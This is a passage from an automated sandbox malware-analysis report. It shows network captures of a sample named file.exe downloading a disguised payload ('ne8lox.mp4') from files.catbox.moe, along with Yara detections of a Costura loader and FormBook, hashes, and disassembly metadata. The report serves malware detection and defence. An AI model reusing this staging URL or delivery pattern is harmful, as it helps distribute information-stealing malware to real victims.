Nov 26, 2024 00:12:02.072089911 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.152848005 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.152863026 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.152928114 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.152947903 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.152986050 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.230669022 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.230689049 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.230803013 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.230838060 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.230880976 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.236310005 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.236325979 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.236391068 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.236421108 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.236459970 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.241549969 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.241571903 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.241636038 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.241647005 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.241682053 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.247117043 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.247136116 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.247220993 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.247230053 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.247272968 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.252824068 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.252846003 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.252918959 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.252928972 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.252980947 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.258372068 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.258388996 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.258486986 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.258497000 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.258541107 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.264002085 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.264019966 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.264101982 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.264111996 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.264158010 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.344697952 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.344713926 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.344850063 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.344887972 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.344930887 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.424407005 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.424428940 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.424571991 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.424609900 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.424654007 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.428308010 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.428323984 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.428389072 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.428416967 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.428455114 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.433978081 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.434003115 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.434062004 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.434096098 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.434138060 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.439044952 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.439062119 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.439130068 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.439156055 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.439197063 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.444828033 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.444848061 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.444928885 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.444952965 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.444993973 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.450222969 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.450239897 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.450306892 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.450329065 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.450367928 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.455107927 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.455156088 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.455180883 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.455193043 CET	443	49704	108.181.20.35	192.168.2.5
Nov 26, 2024 00:12:02.455218077 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.455243111 CET	49704	443	192.168.2.5	108.181.20.35
Nov 26, 2024 00:12:02.463243961 CET	49704	443	192.168.2.5	108.181.20.35

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 26, 2024 00:11:57.317744970 CET	61647	53	192.168.2.5	1.1.1.1
Nov 26, 2024 00:11:58.033819914 CET	53	61647	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 26, 2024 00:11:57.317744970 CET	192.168.2.5	1.1.1.1	0xaa23	Standard query (0)	files.catbox.moe	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 26, 2024 00:11:58.033819914 CET	1.1.1.1	192.168.2.5	0xaa23	No error (0)	files.catbox.moe		108.181.20.35	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

files.catbox.moe

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	108.181.20.35	443	1984	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:11:59 UTC	76	OUT	GET /ne8lox.mp4 HTTP/1.1 Host: files.catbox.moe Connection: Keep-Alive
2024-11-25 23:12:00 UTC	538	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 23:12:00 GMT Content-Type: video/mp4 Content-Length: 1192968 Last-Modified: Mon, 25 Nov 2024 22:59:14 GMT Connection: close ETag: "67450142-123408" X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self'; Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD Accept-Ranges: bytes
2024-11-25 23:12:00 UTC	15846	IN	Data Raw: a5 ff d6 8f cd 0e 55 c0 2c eb 72 b6 09 21 0d c9 08 9f d3 a4 ea cb 2d 8b 1a 66 82 0c e3 9e a3 0d 50 f2 93 71 7b 9a 6d bc 9d 9f 21 f3 67 39 7b d8 ec 94 85 d7 3e 1f 50 64 c7 4a bf ab 21 ab c5 71 85 43 99 49 14 41 77 d9 0b b6 ce f4 c0 b5 93 08 63 2e f8 73 b2 1e b7 38 83 f0 03 23 b5 77 a8 df e3 ee 31 09 27 70 9c 33 fc 6b a8 f5 ba 81 8d e5 58 d2 89 86 30 5f 09 9e 61 7a bf ca 2f 9a f8 83 9b b5 8d ac 54 06 d9 2e 64 6f 7e ac 48 b8 68 af f3 23 3a 7a 2c c9 fd 7e cc d4 d3 2c be 4b 7f 59 4d 9d 7e 48 9e 96 fe 48 fa 43 c1 f0 ec a2 8c 3b b0 24 77 b1 b9 cf ef b1 22 ab 30 41 9c b8 7b d6 e9 62 de c8 de af 1a ee 1d e6 15 02 1b 5d 13 ed fa d8 f0 ba fc ff a1 c3 d0 13 bd 75 9f 86 51 72 f9 b6 51 1a 53 f9 c3 5f 45 85 2f 8d 84 16 8b a7 06 da 28 1f 40 3b 6b 97 c9 b3 89 9f 7d c1 24 Data Ascii: U,r!-fPq{m!g9{>PdJ!qCIAwc.s8#w1'p3kX0_az/T.do~Hh#:z,~,KYM~HHC;$w"0A{b]uQrQS_E/(@;k}$
2024-11-25 23:12:00 UTC	16384	IN	Data Raw: 56 f8 cb ef 74 c9 ca b4 f9 16 42 6a 8f 45 a3 6d 41 30 53 5e 77 35 a6 ee de 70 12 f2 6e ce f6 cd 9d 46 a6 1a bb 6a f6 ae b0 cb b4 5e 7e d5 89 03 b8 45 0c a5 5b 9f 6f 92 56 e7 87 48 ee cb 64 1e 31 a6 a4 23 4a df 2e 30 1e b6 59 0b cb 89 13 0c d7 74 6f dc 90 5c 52 25 ee f5 b1 30 75 b3 d5 a6 d7 87 b5 f3 b2 3b 72 0b 55 aa 8f 79 84 de 94 6f f5 42 36 e7 9e e0 6b 1e 2a 8c 28 2e 98 45 02 b1 b5 33 cb 81 6b 28 c9 7b ef fb 98 90 e5 fd 1e 85 2b 6c 90 58 b3 98 ad b2 cb 6d 8c b7 97 21 be 16 1b 0c bc 4e 98 cc 11 1c 36 d8 15 3c 05 9a 71 59 fe 5e 1d 3d 7b fa 09 63 dc 67 36 3f 69 7f a2 cd 55 c6 7d b9 41 24 0a 44 6d 4b a7 63 14 6b ea 53 e6 36 51 ac 5c 06 2d ff e2 20 54 a2 ac 7a 6e 54 e8 cd 25 ed 1b f3 1c 01 12 f8 3e 0c c0 42 86 4a 77 9a 0b d1 f2 d4 62 50 e1 13 46 86 1f 91 37 Data Ascii: VtBjEmA0S^w5pnFj^~E[oVHd1#J.0Yto\R%0u;rUyoB6k*(.E3k({+lXm!N6<qY^={cg6?iU}A$DmKckS6Q\- TznT%>BJwbPF7
2024-11-25 23:12:00 UTC	16384	IN	Data Raw: e9 73 32 88 01 b7 d5 fe f2 5a db 76 fc a4 7e a2 e9 37 be b8 8f 7a 95 48 1d e9 70 24 3b 14 3b ad c1 4d 8a 57 a8 2d ab cc da 99 c9 45 ea c8 09 9a 5b 01 7f e1 25 0e 7f 18 01 e0 85 3e 15 be 43 8f a6 7c b2 f0 e7 30 e6 eb 3d 85 04 ae 3f 15 69 15 f0 be 05 50 01 3a 6a 28 44 38 92 d9 9f 63 9a 1d 97 e3 c8 0d ac 5c 9b b6 5f d0 d7 7c ed 53 33 d1 43 49 af e0 3b 9a b5 a9 c5 da 34 b9 29 f6 55 8a a2 e5 71 1a fc 98 96 d0 7b ee bf ab e3 c6 15 5f f9 63 fb 3e 4d 3a 40 0c c7 9b 77 2b f6 c7 1e 66 13 69 88 d5 35 f7 f8 a3 b4 ac ac 28 a4 f6 dc f3 8c 27 a1 c1 dd 9b 6b 9d e8 12 53 79 7a 22 02 7d fe a4 9c c9 48 dc 61 c0 51 d7 59 49 b4 cb 62 bd 60 87 f2 69 80 05 aa 85 fb 6d e8 19 6f 7a d7 69 4b 54 14 b6 9d 8a dc f9 35 07 3b 28 61 16 ec 10 b4 4c f4 ac 3a 9e 6b 99 10 8c d3 d2 9e ae 74 Data Ascii: s2Zv~7zHp$;;MW-E[%>C\|0=?iP:j(D8c\_\|S3CI;4)Uq{_c>M:@w+fi5('kSyz"}HaQYIb`imoziKT5;(aL:kt
2024-11-25 23:12:00 UTC	16384	IN	Data Raw: f2 9f fe 75 fb 38 23 52 e4 23 81 b5 53 6d 28 63 68 73 3f d4 be 34 35 15 ee 09 56 d4 24 96 d9 fd 6d 1c 56 b2 86 db 65 cb 62 e8 2a 1a 11 29 c4 6d c2 a3 50 a2 c3 c2 79 b1 42 bc b6 1b 74 34 a7 05 b8 79 78 21 db 8c fb 1e 43 cd 17 b9 79 c3 dd 32 f1 94 3c 47 20 a7 44 a0 4b e8 19 a2 0a 71 1b 1f 4f 1d 64 57 22 ef fa 65 b7 fb 51 90 4f 1f 78 45 4c 18 2e 8b 3f c6 59 c1 05 8e 1c 18 d7 3a 44 c3 10 80 a0 44 6c 2f 0f d1 b2 52 17 0b 2a 55 05 f1 e6 c8 16 36 c8 1a 8c 99 d5 da f0 f3 67 69 0b e4 42 b0 33 39 bc 3c 42 d2 7d 35 23 e6 43 20 15 90 87 a1 a8 47 c2 9d 32 5d 15 1a 73 2c 95 22 63 de d1 ed 16 5b f8 eb 90 1f 44 65 ac 91 c3 1a 91 98 61 d6 47 14 c0 f3 f3 60 89 bb e2 46 41 48 c9 37 42 e0 ba e8 c0 cd cd 46 fe b1 43 a7 a1 f8 df a5 7b dc f8 87 c4 62 23 e1 de 08 ab 22 c6 7d 01 Data Ascii: u8#R#Sm(chs?45V$mVeb)mPyBt4yx!Cy2<G DKqOdW"eQOxEL.?Y:DDl/RU6giB39<B}5#C G2]s,"c[DeaG`FAH7BFC{b#"}
2024-11-25 23:12:00 UTC	16384	IN	Data Raw: 6e e7 fc ca 6d 15 14 07 b3 c0 15 2c 9f 19 b7 6f 16 e6 13 f3 58 59 46 e4 84 8e 03 79 e8 c9 0a bf 80 fc 2c e7 50 30 56 b4 e4 86 fc 80 0c fa 9d 2d 65 ed 43 7d 3d 01 59 f6 ca 96 0b 5a fd 9f 28 a3 80 bd e4 97 47 88 39 83 f9 48 ee 62 34 6c 59 2b 7d bd b6 ba d0 16 8f 2b 21 3e 16 cc cc 18 6e 02 28 36 f9 87 56 53 93 54 a0 c5 2a 76 41 26 a9 83 f7 e0 f7 5e 44 74 b0 0c fc c2 e8 a5 a9 cb 72 47 ee b6 12 7b bc e5 26 34 63 e9 9a de b3 96 89 88 1c cd a5 7e a7 e2 72 0c 39 37 12 6c 76 c2 c5 ca 01 7d 9c 5f ee 91 88 58 40 32 85 15 57 83 8e 61 36 7b dd 5c 41 4a bb ba 06 7e d8 f5 ce 66 94 c2 6a 31 fb 6f f6 3d c8 47 52 a0 e2 74 1e 39 af 36 62 ee 20 04 ed 25 ab 8b a0 27 ca 4c 2a 7c ae 7c 81 f2 4a 26 32 6b 1f 3c 43 19 eb 02 37 dd bd 52 2d f6 7a ba 53 e2 74 43 f8 cd 80 60 39 8f f9 Data Ascii: nm,oXYFy,P0V-eC}=YZ(G9Hb4lY+}+!>n(6VSTvA&^DtrG{&4c~r97lv}_X@2Wa6{\AJ~fj1o=GRt96b %'L\|\|J&2k<C7R-zStC`9
2024-11-25 23:12:00 UTC	16384	IN	Data Raw: b3 1e 64 c3 7a d0 e2 80 37 c7 37 3f 01 1d fc fa da ec 7e b2 a9 38 e1 44 ae 72 84 b1 8f b2 22 ec bc a7 eb bf b6 f0 59 5e 4d 75 41 9d 4c 7c 04 f5 4c 52 70 b0 e7 00 ba 70 16 71 00 49 6e 95 0e db 76 fd 2d 92 f6 a1 3e 97 cb 86 2c 24 71 6b 76 76 1a 12 5d 5c ef 48 38 d8 63 de 55 63 33 51 55 77 23 0d a7 df 63 9e 26 3f 9d fa 24 74 84 a2 2a 7e d5 eb d8 04 59 23 04 eb 0e 54 24 52 b8 08 58 14 eb 87 4a 1b e7 b9 f6 14 04 5d 1a 50 61 d5 84 47 2f 7b 32 7f b5 fd 2c 4f 59 a7 fc 70 3e 42 fc 2c 1f b3 0d c2 7f e9 5b 27 d4 c3 b7 74 3c 52 1f 2e 10 41 ed bb 5c 93 55 3a 0a 3d a4 32 be e2 12 54 80 29 35 cd d6 b8 c5 b8 1b 92 ee b1 34 07 b7 b1 f6 b0 1f 8f a8 0a 93 e0 67 5a 40 0b 24 75 fe be f0 73 c4 03 0f 53 51 b8 8c 84 ef 6b 15 3a 4e 10 e3 8c 0f 7e bd 09 48 e7 39 97 5e 15 67 33 ca Data Ascii: dz77?~8Dr"Y^MuAL\|LRppqInv->,$qkvv]\H8cUc3QUw#c&?$t*~Y#T$RXJ]PaG/{2,OYp>B,['t<R.A\U:=2T)54gZ@$usSQk:N~H9^g3
2024-11-25 23:12:00 UTC	16384	IN	Data Raw: c6 78 3b 94 4b a7 81 b9 9d e5 2a 7a 4e 98 23 c6 29 ef 19 69 76 66 9a d1 82 1c 7b f6 c0 ba 54 37 eb 9d 8c 04 4f 6d 5f cb 30 d9 53 da 17 c7 59 3c 07 fe 9b 9b 4c f1 6e 96 61 f2 cb 45 7e b6 18 25 fd 90 13 00 c7 62 cb 2e 63 85 64 d9 82 40 61 aa fd 21 92 6d 3e 07 c1 8b d2 d2 10 fd 21 90 93 92 1e d3 44 ff 7b a6 3c d2 1c c0 f7 b8 d5 51 0a af 82 df c4 33 b4 c8 55 be b9 94 ab de 2e 2c da ca ae ff 64 96 40 2d 2a 81 a6 4a 47 2b a1 f4 f8 3c f1 94 79 3f 3b c5 94 b6 d3 1d 80 1a 4a db 25 3a 5e 61 9b a2 e9 28 84 39 42 fc 3d 12 9e 4c 66 58 88 05 8b 60 51 28 92 07 1c 69 c3 1b 00 9c 8e 95 b8 c6 ad c0 4e 47 a3 cf 51 58 d3 b8 90 b6 48 3d 08 fd 74 18 45 53 d5 b9 06 85 bb 0d db f5 92 8e 83 9b 78 22 ac a8 08 7c 52 9d 00 40 af e5 ae a0 67 6b 99 46 eb 27 a0 98 43 41 c5 03 9e ea 48 Data Ascii: x;KzN#)ivf{T7Om_0SY<LnaE~%b.cd@a!m>!D{<Q3U.,d@-JG+<y?;J%:^a(9B=LfX`Q(iNGQXH=tESx"\|R@gkF'CAH
2024-11-25 23:12:00 UTC	16384	IN	Data Raw: b0 4b a3 f4 4b a6 3d 2b f8 bd cd c5 3b 53 55 7b 3d d5 4c d6 81 40 f1 35 98 69 44 2e 63 e7 ab 34 4d 50 a8 2d 25 b1 00 10 9a cb 00 2f 04 8d ea d2 9f f6 11 b5 a6 f4 9a 2c d0 d9 f8 ad 14 9b 03 54 71 fa 4d f4 a1 bd fa 78 76 89 a0 2d 02 2c 0b c5 a2 de 2e 9d b2 56 fb 7f 38 da dd 24 97 80 fe ef dd e5 e8 c8 95 e5 24 a0 43 b5 6b b9 2c a9 30 b4 e6 08 ca 66 71 6f 94 9a 73 76 a6 65 c6 39 0b 25 06 e8 e3 4c 26 18 2e 4a 52 dd a9 5c 97 26 96 47 10 7b b3 dc 65 ba c4 73 f5 b2 71 1c a0 6c 01 e1 a3 8a a8 c3 66 2a 34 41 a2 7d 3a 36 9e e6 51 b2 99 51 76 af b4 36 3a 22 9b 76 d8 98 9b 9d 3f 87 0b ee d2 69 32 69 78 c6 8b b0 6a eb ba be d0 4a d6 01 ce 6a 8e d8 ea 21 df 70 32 8e 1f 50 be 74 c3 a2 ce a6 3f 91 b0 ec 08 f7 9e d5 62 b8 90 f1 1c 7b 3d 5d ec 21 44 b9 2f 90 db 5c 6a 26 bf Data Ascii: KK=+;SU{=L@5iD.c4MP-%/,TqMxv-,.V8$$Ck,0fqosve9%L&.JR\&G{esqlf*4A}:6QQv6:"v?i2ixjJj!p2Pt?b{=]!D/\j&
2024-11-25 23:12:00 UTC	16384	IN	Data Raw: 80 ee 9d 87 ae 6c c0 af ec de 90 db 72 7d 8b aa 6b 8e 61 31 15 99 1c 68 a8 47 49 22 ac 90 2b 23 2c 23 47 02 81 e1 ef 1e 8e a6 fc 77 d5 9d 23 34 e3 e6 ae 71 55 fb da a6 1b 51 07 9f 66 14 6e 51 13 b2 e4 6a 7d e5 db af 5c cb a1 98 26 25 81 d2 78 33 96 09 12 d7 36 b0 66 55 43 f8 0e 01 ad f7 4e c6 9a ff 3b 72 37 de 3b 4b 51 58 fc df 91 27 b2 2c 6d b1 38 70 ed 3c 03 74 c0 f2 11 ba 74 31 8e bb 6f ce 06 7b 78 d5 3c c7 68 4c 4d be 79 c7 71 cb 0b 25 da b5 ae cf 53 2d 21 3d c4 9b c7 e5 9d 5a 5b dd 4e 89 66 15 14 22 6f 10 9c fc 24 f0 55 25 fd ca a8 3c 80 d5 01 f0 ac d3 d8 ce dd ba 7e f8 69 da 62 ba 37 c4 63 fb 2f 46 fc f2 eb 91 c4 df b4 00 19 ca 1b a6 cb 38 6b c2 63 af 4a 29 9c 21 db fd 19 1d 0a 39 a6 fa 61 55 e1 7b f1 ee 1a 35 c2 f3 6e 6b ba 69 be 2c 49 bb d9 e8 fb Data Ascii: lr}ka1hGI"+#,#Gw#4qUQfnQj}\&%x36fUCN;r7;KQX',m8p<tt1o{x<hLMyq%S-!=Z[Nf"o$U%<~ib7c/F8kcJ)!9aU{5nki,I
2024-11-25 23:12:00 UTC	16384	IN	Data Raw: de 12 26 f5 17 f5 be b6 54 02 21 83 2f 0b 42 08 79 5e 77 cc 29 18 a0 f8 aa ab be a6 87 49 d2 6e 2b 9a 8f 60 dd c2 26 16 ca 18 a7 78 39 51 8b 66 2c 95 89 e2 f4 60 76 06 d0 d5 55 9c 04 cb 36 0f b6 06 48 2e 49 ee 28 b8 5b 73 b5 c7 1e 8d 60 0c f0 1c 14 ef c1 93 cd 86 e1 a7 6a 60 f5 7c c1 a2 1d 47 2d 36 10 b7 fa 7a e7 b4 2e 2b 59 56 ad 3e ba aa 57 e4 f8 70 c5 40 6c 16 5f e3 f3 08 1c 7a 27 ae 98 0a 34 ba bc f3 82 76 1b 97 60 aa 5c f0 0a 6d 60 9b 15 c7 f4 08 44 14 cb c4 dd 1f f0 6b 3f d4 7f 34 66 02 15 81 06 2d 1d b5 6b 47 59 f3 88 af 81 d0 73 fa 71 4a c2 34 34 f9 8a 74 d5 8d b8 1c d9 41 0e 27 ed 3d 3a 20 bb 45 d7 fe 46 c2 be 1a 5f 4b 06 27 c8 cf e3 12 93 97 00 37 0e ff c6 b2 fc 25 c6 98 ed 03 d7 3c 9a a4 b6 2f f4 48 22 bd 49 d7 35 3c 7c 53 3f 44 60 e2 fc c6 f9 Data Ascii: &T!/By^w)In+`&x9Qf,`vU6H.I([s`j`\|G-6z.+YV>Wp@l_z'4v`\m`Dk?4f-kGYsqJ44tA'=: EF_K'7%</H"I5<\|S?D`

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: file.exePID: 1984, Parent PID: 1028

General

Target ID:	0
Start time:	18:11:56
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x2d0000
File size:	233'472 bytes
MD5 hash:	0A089E934EB856C3E809D0FAC53000C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2111813386.000000000274A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2133396929.0000000006A50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: file.exePID: 528, Parent PID: 1028

General

Target ID:	2
Start time:	18:12:02
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xbb0000
File size:	233'472 bytes
MD5 hash:	0A089E934EB856C3E809D0FAC53000C7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2217550179.00000000015C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2216787886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: file.exePID: 1984, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	11.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.9%
Total number of Nodes:	309
Total number of Limit Nodes:	7

Executed Functions

Function 06CA0040 Relevance: 16.2, Strings: 12, Instructions: 1174COMMON

Download Yara Rule

Strings

$jq, xrefs: 06CA0487
$jq, xrefs: 06CA02D3
$jq, xrefs: 06CA0911
$jq, xrefs: 06CA0547
,nq, xrefs: 06CA0AFA
$jq, xrefs: 06CA0537
$jq, xrefs: 06CA0921
4, xrefs: 06CA0A15
$jq, xrefs: 06CA097A
$jq, xrefs: 06CA0497
$jq, xrefs: 06CA02C3
$jq, xrefs: 06CA096A

Memory Dump Source

Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_file.jbxd

Similarity

API ID:
String ID: ,nq$4$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
API String ID: 0-162385967
Opcode ID: 9d5c507b4acec96968f432524f70a124f9c1c85146704708e2ef226482292955
Instruction ID: 49f07febe43f6dec430e8c3247464b705c17293f9ad54d47207b387ac6918763
Opcode Fuzzy Hash: 9d5c507b4acec96968f432524f70a124f9c1c85146704708e2ef226482292955
Instruction Fuzzy Hash: 15B21534B002198FDB54CFA9C994BADB7B6BF88348F158199E505AB3A5CB70ED81CF50

Function 06CA0367 Relevance: 8.0, Strings: 6, Instructions: 495COMMON

Download Yara Rule

Strings

$jq, xrefs: 06CA0487
$jq, xrefs: 06CA0911
,nq, xrefs: 06CA0AFA
$jq, xrefs: 06CA0537
4, xrefs: 06CA0A15
$jq, xrefs: 06CA096A

Memory Dump Source

Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_file.jbxd

Similarity

API ID:
String ID: ,nq$4$$jq$$jq$$jq$$jq
API String ID: 0-3947795074
Opcode ID: 7e17bd7686fc23d25f4c3a2bdf281efff92da04019130f89c03d6ff5d28e2ac6
Instruction ID: ebacfb5f4b2ea887a159c10af1599f0244acabd4b8549fbeac110c65159b6a43
Opcode Fuzzy Hash: 7e17bd7686fc23d25f4c3a2bdf281efff92da04019130f89c03d6ff5d28e2ac6
Instruction Fuzzy Hash: 9722E734B00219CFDB64DFA5C994BADB7B2FF48348F1581A9D509AB2A5DB30AD81CF50

Function 069D39E8 Relevance: 6.0, Strings: 4, Instructions: 983
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tejq, xrefs: 069D410B
pnq, xrefs: 069D45A2
TJoq, xrefs: 069D3B8A
xbmq, xrefs: 069D3B15

Memory Dump Source

Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69d0000_file.jbxd

Similarity

API ID:
String ID: TJoq$Tejq$pnq$xbmq
API String ID: 0-1294180740
Opcode ID: 1045460b6ae606ee5753bd74659684e8f98757ab883df64bd554c1b8eab6c9c4
Instruction ID: c2ff9660519ad761e13b4c6c4ad93268e21e32ee3cae841481db82e37c43ef41
Opcode Fuzzy Hash: 1045460b6ae606ee5753bd74659684e8f98757ab883df64bd554c1b8eab6c9c4
Instruction Fuzzy Hash: 89A2C575E00228CFDB65CF69C984A99BBB2FF89300F1581E9D509AB365DB319E81CF50

Function 069C4260 Relevance: 4.4, Strings: 3, Instructions: 615
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

